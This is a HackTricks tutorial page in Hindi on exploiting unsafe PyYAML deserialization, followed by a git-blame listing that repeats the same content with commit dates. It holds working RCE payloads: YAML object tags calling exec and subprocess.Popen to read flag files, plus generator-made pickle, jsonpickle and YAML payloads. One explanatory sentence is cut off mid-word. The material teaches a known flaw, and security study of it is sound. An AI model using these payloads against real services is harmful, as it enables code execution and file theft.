hacktricks/pentesting-web/deserialization/python-yaml-deserialization.md

<details>

<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

HackTricks का समर्थन करने के अन्य तरीके:

* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।

</details>


# Yaml **डिसीरियलाइजेशन**

**Yaml** python पुस्तकालय भी **पायथन ऑब्जेक्ट्स को सिर्फ रॉ डेटा** के रूप में नहीं, सीरियलाइज करने में सक्षम है:
```
print(yaml.dump(str("lol")))
lol
...

print(yaml.dump(tuple("lol")))
!!python/tuple
- l
- o
- l

print(yaml.dump(range(1,10)))
!!python/object/apply:builtins.range
- 1
- 10
- 1
```
जांचें कि **tuple** एक कच्चा प्रकार का डेटा नहीं है और इसलिए इसे **सिरीकरण** किया गया था। और यही हुआ **range** के साथ भी (builtins से लिया गया)।

![](<../../.gitbook/assets/image (628) (1).png>)

**safe\_load()** या **safe\_load\_all()** SafeLoader का उपयोग करते हैं और **क्लास ऑब्ज
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:builtins.range [1, 10, 1]'

print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)
print(yaml.load(data, Loader=Loader)) #range(1, 10)
print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load(data)) #range(1, 10)
print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>

#The other ways to load data will through an error as they won't even attempt to
#deserialize the python object
```
पिछला कोड **unsafe\_load** का उपयोग करता था जो सीरीयलाइज्ड पायथन क्लास लोड करने के लिए किया गया था। यह इसलिए है क्योंकि **version >= 5.1** में, यह किसी भी सीरीयलाइज्ड पायथन क्लास या क्लास एट्रिब्यूट को **डीसीरियलाइज़** करने की अनुमति नहीं देता है, Loader not specified in load() or Loader=SafeLoader।

## मूल शोषण

**नींद लागू करने** के एक उदाहरण:
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:time.sleep [2]'
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
print(yaml.load(data, Loader=Loader)) #Executed
print(yaml.load_all(data))
print(yaml.load_all(data, Loader=Loader))
print(yaml.load_all(data, Loader=UnsafeLoader))
print(yaml.load_all(data, Loader=FullLoader))
print(yaml.unsafe_load(data)) #Executed
print(yaml.full_load_all(data))
print(yaml.unsafe_load_all(data))
```
## वंलरेबल .load("\<content>") लोड करने पर Loader के बिना

पुराने संस्करणों में pyyaml डेसीरियलाइजेशन हमलों के लिए वंलरेबल थे अगर आप कुछ लोड करते समय Loader स्पष्ट नहीं किया: `yaml.load(data)`

आप यहाँ [**वंलरेबिलिटी का विवरण पा सकते हैं**](https://hackmd.io/@defund/HJZajCVlP)**.** उस पृष्ठ में प्रस्तावित **एक्स्प्लॉइट** है:
```yaml
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state:
update: !!python/name:exec
```
या आप इस **वन-लाइनर का उपयोग भी कर सकते हैं जो @ishaack द्वारा प्रदान किया गया है**:
```yaml
!!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]}
```
नोट करें कि **हाल के संस्करणों** में आप **अब `.load()` को नहीं कह सकते** हैं बिना **`Loader`** और **`FullLoader`** इस हमले के लिए **अब असंरक्षित** नहीं है।

# RCE

कस्टम payloads को बनाने के लिए Python YAML modules जैसे **PyYAML** या **ruamel.yaml** का उपयोग किया जा सकता है। ये payloads उन systems में दोषों का शोषण कर सकते हैं जो अविश्वसनीय इनपुट को उचित सेनिटाइजेशन के बिना डिसीरियलाइज़ करते हैं।
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
import subprocess

class Payload(object):
def __reduce__(self):
return (subprocess.Popen,('ls',))

deserialized_data = yaml.dump(Payload()) # serializing data
print(deserialized_data)

#!!python/object/apply:subprocess.Popen
#- ls

print(yaml.load(deserialized_data, Loader=UnsafeLoader))
print(yaml.load(deserialized_data, Loader=Loader))
print(yaml.unsafe_load(deserialized_data))
```
## उपकरण पेयलोड बनाने के लिए

यह उपकरण [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) का उपयोग किया जा सकता है ताकि **Pickle, PyYAML, jsonpickle और ruamel.yaml** का दुरुपयोग करने के लिए पायथन डिसीरियलाइज़ेशन पेयलोड उत्पन्न किया जा सके:
```bash
python3 peas.py
Enter RCE command :cat /root/flag.txt
Enter operating system of target [linux/windows] . Default is linux :linux
Want to base64 encode payload ? [N/y] :
Enter File location and name to save :/tmp/example
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
Done Saving file !!!!

cat /tmp/example_jspick
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}

cat /tmp/example_pick | base64 -w0
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==

cat /tmp/example_yaml
!!python/object/apply:subprocess.Popen
- !!python/tuple
- cat
- /root/flag.txt
```
## संदर्भ

* [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
* [https://net-square.com/yaml-deserialization-attack-in-python.html](https://net-square.com/yaml-deserialization-attack-in-python.html)


<details>

<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

HackTricks का समर्थन करने के अन्य तरीके:

* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			`HackTricks का समर्थन करने के अन्य तरीके:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`* यदि आप चाहते हैं कि आपकी कंपनी HackTricks में विज्ञापित हो या HackTricks को PDF में डाउनलोड करें तो [सब्सक्रिप्शन प्लान्स](https://github.com/sponsors/carlospolop) की जांच करें!`
Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			`* [आधिकारिक PEASS और HackTricks स्वैग](https://peass.creator-spring.com) प्राप्त करें`
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`* हमारे विशेष [NFTs](https://opensea.io/collection/the-peass-family) संग्रह, [The PEASS Family](https://opensea.io/collection/the-peass-family) खोजें`
			`* शामिल हों 💬 [डिस्कॉर्ड समूह](https://discord.gg/hRep4RUj7f) या [टेलीग्राम समूह](https://t.me/peass) और मुझे Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm) पर फॉलो करें।`
			`* अपने हैकिंग ट्रिक्स साझा करें, HackTricks और [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`


Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`# Yaml डिसीरियलाइजेशन`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`Yaml python पुस्तकालय भी पायथन ऑब्जेक्ट्स को सिर्फ रॉ डेटा के रूप में नहीं, सीरियलाइज करने में सक्षम है:`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00			```
			`print(yaml.dump(str("lol")))`
			`lol`
			`...`

			`print(yaml.dump(tuple("lol")))`
			`!!python/tuple`
			`- l`
			`- o`
			`- l`
Translated to Hindi 2023-11-06 08:38:02 +00:00
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00			`print(yaml.dump(range(1,10)))`
			`!!python/object/apply:builtins.range`
			`- 1`
			`- 10`
			`- 1`
			```
Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			`जांचें कि tuple एक कच्चा प्रकार का डेटा नहीं है और इसलिए इसे सिरीकरण किया गया था। और यही हुआ range के साथ भी (builtins से लिया गया)।`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00
GitBook: [#3071] No subject 2022-03-21 17:37:28 +00:00			`![](<../../.gitbook/assets/image (628) (1).png>)`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`safe\_load() या safe\_load\_all() SafeLoader का उपयोग करते हैं और **क्लास ऑब्ज`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00			```python
			`import yaml`
			`from yaml import UnsafeLoader, FullLoader, Loader`
			`data = b'!!python/object/apply:builtins.range [1, 10, 1]'`

			`print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)`
			`print(yaml.load(data, Loader=Loader)) #range(1, 10)`
			`print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>`
			`print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>`
			`print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>`
			`print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>`
			`print(yaml.unsafe_load(data)) #range(1, 10)`
			`print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>`
			`print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>`

			`#The other ways to load data will through an error as they won't even attempt to`
			`#deserialize the python object`
			```
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			पिछला कोड unsafe\_load का उपयोग करता था जो सीरीयलाइज्ड पायथन क्लास लोड करने के लिए किया गया था। यह इसलिए है क्योंकि version >= 5.1 में, यह किसी भी सीरीयलाइज्ड पायथन क्लास या क्लास एट्रिब्यूट को डीसीरियलाइज़ करने की अनुमति नहीं देता है, Loader not specified in load() or Loader=SafeLoader।
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00
Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			`## मूल शोषण`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`नींद लागू करने के एक उदाहरण:`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00			```python
			`import yaml`
			`from yaml import UnsafeLoader, FullLoader, Loader`
			`data = b'!!python/object/apply:time.sleep [2]'`
			`print(yaml.load(data, Loader=UnsafeLoader)) #Executed`
			`print(yaml.load(data, Loader=Loader)) #Executed`
			`print(yaml.load_all(data))`
			`print(yaml.load_all(data, Loader=Loader))`
			`print(yaml.load_all(data, Loader=UnsafeLoader))`
			`print(yaml.load_all(data, Loader=FullLoader))`
			`print(yaml.unsafe_load(data)) #Executed`
			`print(yaml.full_load_all(data))`
			`print(yaml.unsafe_load_all(data))`
			```
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`## वंलरेबल .load("\<content>") लोड करने पर Loader के बिना`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			पुराने संस्करणों में pyyaml डेसीरियलाइजेशन हमलों के लिए वंलरेबल थे अगर आप कुछ लोड करते समय Loader स्पष्ट नहीं किया: `yaml.load(data)`
GitBook: [#3021] No subject 2022-02-18 17:51:13 +00:00
Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			`आप यहाँ [वंलरेबिलिटी का विवरण पा सकते हैं](https://hackmd.io/@defund/HJZajCVlP). उस पृष्ठ में प्रस्तावित एक्स्प्लॉइट है:`
GitBook: [#3021] No subject 2022-02-18 17:51:13 +00:00			```yaml
			`!!python/object/new:str`
			`state: !!python/tuple`
			`- 'print(getattr(open("flag\x2etxt"), "read")())'`
			`- !!python/object/new:Warning`
Translated to Hindi 2023-11-06 08:38:02 +00:00			`state:`
			`update: !!python/name:exec`
GitBook: [#3021] No subject 2022-02-18 17:51:13 +00:00			```
Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			`या आप इस वन-लाइनर का उपयोग भी कर सकते हैं जो @ishaack द्वारा प्रदान किया गया है:`
GitBook: [#3023] No subject 2022-02-18 18:14:38 +00:00			```yaml
			`!!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]}`
			```
Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			नोट करें कि हाल के संस्करणों में आप अब `.load()` को नहीं कह सकते हैं बिना `Loader` और `FullLoader` इस हमले के लिए अब असंरक्षित नहीं है।
GitBook: [#3021] No subject 2022-02-18 17:51:13 +00:00
fix mess 2022-05-01 12:41:36 +00:00			`# RCE`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`कस्टम payloads को बनाने के लिए Python YAML modules जैसे PyYAML या ruamel.yaml का उपयोग किया जा सकता है। ये payloads उन systems में दोषों का शोषण कर सकते हैं जो अविश्वसनीय इनपुट को उचित सेनिटाइजेशन के बिना डिसीरियलाइज़ करते हैं।`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00			```python
			`import yaml`
			`from yaml import UnsafeLoader, FullLoader, Loader`
			`import subprocess`

			`class Payload(object):`
Translated to Hindi 2023-11-06 08:38:02 +00:00			`def __reduce__(self):`
			`return (subprocess.Popen,('ls',))`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00
			`deserialized_data = yaml.dump(Payload()) # serializing data`
			`print(deserialized_data)`

			`#!!python/object/apply:subprocess.Popen`
			`#- ls`

			`print(yaml.load(deserialized_data, Loader=UnsafeLoader))`
			`print(yaml.load(deserialized_data, Loader=Loader))`
			`print(yaml.unsafe_load(deserialized_data))`
			```
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`## उपकरण पेयलोड बनाने के लिए`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			यह उपकरण [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) का उपयोग किया जा सकता है ताकि Pickle, PyYAML, jsonpickle और ruamel.yaml का दुरुपयोग करने के लिए पायथन डिसीरियलाइज़ेशन पेयलोड उत्पन्न किया जा सके:
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00			```bash
Translated to Hindi 2023-11-06 08:38:02 +00:00			`python3 peas.py`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00			`Enter RCE command :cat /root/flag.txt`
			`Enter operating system of target [linux/windows] . Default is linux :linux`
			`Want to base64 encode payload ? [N/y] :`
			`Enter File location and name to save :/tmp/example`
			`Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All`
			`Done Saving file !!!!`

Translated to Hindi 2023-11-06 08:38:02 +00:00			`cat /tmp/example_jspick`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00			`{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}`

			`cat /tmp/example_pick \| base64 -w0`
			`gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==`

			`cat /tmp/example_yaml`
			`!!python/object/apply:subprocess.Popen`
			`- !!python/tuple`
Translated to Hindi 2023-11-06 08:38:02 +00:00			`- cat`
			`- /root/flag.txt`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00			```
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`## संदर्भ`
GitBook: [#2846] python yaml deserialization 2021-11-17 20:11:22 +00:00
Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			`* [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)`
			`* [https://net-square.com/yaml-deserialization-attack-in-python.html](https://net-square.com/yaml-deserialization-attack-in-python.html)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			`<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			`HackTricks का समर्थन करने के अन्य तरीके:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`* यदि आप चाहते हैं कि आपकी कंपनी HackTricks में विज्ञापित हो या HackTricks को PDF में डाउनलोड करें तो [सब्सक्रिप्शन प्लान्स](https://github.com/sponsors/carlospolop) देखें!`
Translated ['generic-methodologies-and-resources/search-exploits.md', 'l 2024-02-06 15:12:12 +00:00			`* [आधिकारिक PEASS & HackTricks स्वैग](https://peass.creator-spring.com) प्राप्त करें`
			`* हमारे विशेष [NFTs](https://opensea.io/collection/the-peass-family) कलेक्शन, [The PEASS Family](https://opensea.io/collection/the-peass-family) खोजें`
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 07:28:54 +00:00			`* शामिल हों 💬 [डिस्कॉर्ड समूह](https://discord.gg/hRep4RUj7f) या [टेलीग्राम समूह](https://t.me/peass) या मुझे ट्विटर 🐦 [@carlospolopm](https://twitter.com/carlospolopm) पर फॉलो** करें।`
			`* अपने हैकिंग ट्रिक्स साझा करें, HackTricks और [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`